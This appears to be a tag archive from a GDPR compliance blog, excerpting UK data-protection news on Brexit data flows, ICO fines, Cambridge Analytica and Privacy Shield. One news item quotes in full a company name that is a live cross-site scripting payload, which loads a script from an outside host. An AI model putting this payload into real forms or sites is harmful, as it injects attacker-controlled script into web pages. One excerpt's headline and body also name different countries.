fbpx

Download free GDPR compliance checklist!

Tag Archives for " UK "

EU, UK mulling interim data flows solution post-Brexit

With time running out for the EU to grant the U.K.’s data protection regime a stamp of approval before the Brexit transition period ends, officials are considering options to keep personal data flowing across the Channel, according to two individuals familiar with the talks.

The officials said that any interim solution is tied up in the wider trade negotiations, which both sides agree are currently stuck. That means that in the event of a no deal, companies would have to use alternative data transfer mechanisms to move data from the EU to the U.K., such as standard contractual clauses — a situation which could cost the U.K. economy as much as £1.6 billion.

Source: EU, UK mulling interim data flows solution post-Brexit

UK businesses face aggregate costs of up to 1.6 billion if no adequacy decision post-Brexit transition period, report finds

The cost to UK businesses of not receiving an adequacy decision from the European Commission could total between £1 billion and £1.6 billion, according to a new report by think tank New Economics Foundation and UCL European Institute.

The report, compiled from interviews with 60 EU and UK legal professionals, data protection officers, business representatives and academics, estimates average costs for impacted businesses could reach £3,000 for a micro business, £10,000 for a small business, £19,555 for a medium business and £162,790 for a large business.

Source: UK businesses face aggregate costs of up to 1.6 billion if no adequacy decision post-Brexit transition period, report finds

‘Antiquated process’: UK data regulator on obtaining Cambridge Analytica warrant

The information commissioner has criticised the “antiquated process” that led to Facebook getting hold of Cambridge Analytica’s servers before the UK regulator itself, and renewed calls for an international approach to data privacy to tackle the emerging threat of data havens.

Elizabeth Denham, the information commissioner, spoke to Damian Collins MP, the former chair of the digital, culture, media and sport committee, who led the parliamentary enquiry into disinformation, on his podcast Infotagion. She described discovering that Facebook was inside the offices of defunct electioneering consultancy Cambridge Analytica while in the middle of an interview with Channel 4’s Jon Snow.

Source: ‘Antiquated process’: data regulator on obtaining Cambridge Analytica warrant | Data protection | The Guardian

UK-Japan deal dismantles UK’s privacy protections

UK quietly commits to weakening restrictions on data transfers by accepting lower privacy standards in new trade deal.

The recent UK-Japan deal negotiated by Elizabeth Truss commits the UK to weakening restrictions on data transfers by accepting lower privacy standards. These commitments are aligned with those in other trade agreements the government wishes to sign. Yet this strategy has never been voted on, analysed or even explained to parliament.

Source: UK-Japan deal dismantles UK’s privacy protections

Ticketmaster fined £1.25m over personal data breach

Ticketmaster has been fined £1.25m for failing to keep the personal data of millions of customers secure.

The online events ticket seller failed to put “appropriate security measures in place” to prevent a cyber-attack on a chat-bot installed on its online payment page, the Information Commissioner’s Office (ICO) in the UK said.

The breach potentially affected 9.4million customers across Europe. As a result, 60,000 payment cards belonging to Barclays Bank customers were subjected to fraud, and another 6,000 cards were replaced by Monzo bank after suspected fraud.

Source: Ticketmaster fined £1.25m over personal data breach

Company forced to change name that could be used to hack websites

Software firm’s director thought name using HTML would be ‘fun and playful’. But Companies House has forced a company to change its name after it belatedly realised it could pose a security risk.

The original name of the company was ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

Source: Company forced to change name that could be used to hack websites | UK news | The Guardian

UK’s ICO faces legal action after closing adtech complaint with nothing to show

The UK’s data watchdog is facing a legal challenge after it took the decision to quietly close a complaint against the adtech industry’s high velocity background trading of personal data.

The original complaint — challenging the adtech industry’s compliance with Europe’s General Data Protection Regulation (GDPR) — was filed to the ICO in September 2018 by Jim Killock, executive director of the Open Rights Group, and Michael Veale, a lecturer in digital rights at the University College London.

Source: UK’s ICO faces legal action after closing adtech complaint with nothing to show for it | TechCrunch

Data protection scofflaws failed to pay £2m or 68% of fines from UK watchdog

Scofflaws have failed to pay nearly £2m in fines handed out by the UK Information Commissioner’s Office over the past 18 months, according to new research.

Between January 2019 and August 2020, the ICO issued a total of £3.2m in monetary penalty notices but just £1.03m has been paid, according to research from SMS API biz The SMS Works.

When measured as a percentage of the fine amount, nuisance-call operators were the least likely to have paid their fines, with The SMS Works finding that just 13 per cent of penalties handed to such firms had been paid.

Source: Data protection scofflaws failed to pay £2m in fines from UK watchdog – and 68% of penalties are still outstanding • The Register

Privacy Shield Is Gone. So What Now?

With companies no longer able to rely on Privacy Shield for protection, companies have two main options available to them: to localize data storage and/or to strengthen their SCCs.

Other options include strong encryption, use of federated data and differential privacy.

The revocation of Privacy Shield does not have to result in a security vacuum. On the contrary, a secure data solution can protect a company from even the most stringent regulations.

Full article: Privacy Shield Is Gone. So What Now? – CPO Magazine

More GDPR applied in the UK than in Italy & France Combined

A report released by BuyShares has revealed that the United Kingdom tops for the imposition of data breach penalties with €132.7 million in the total value of General Data Protection Regulation fines since the legislation was became enforceable on May 25 2018.

It is higher than the combined total of fines sanctioned in Germany and Italy combined. Indeed, the largest five fines for GDPR breaches in the European Union account for 70% of the total fines sanctioned since the data privacy legislation became live in 2018.

Source: More GDPR applied in the UK than in Italy & France Combined – Compliance Junction

>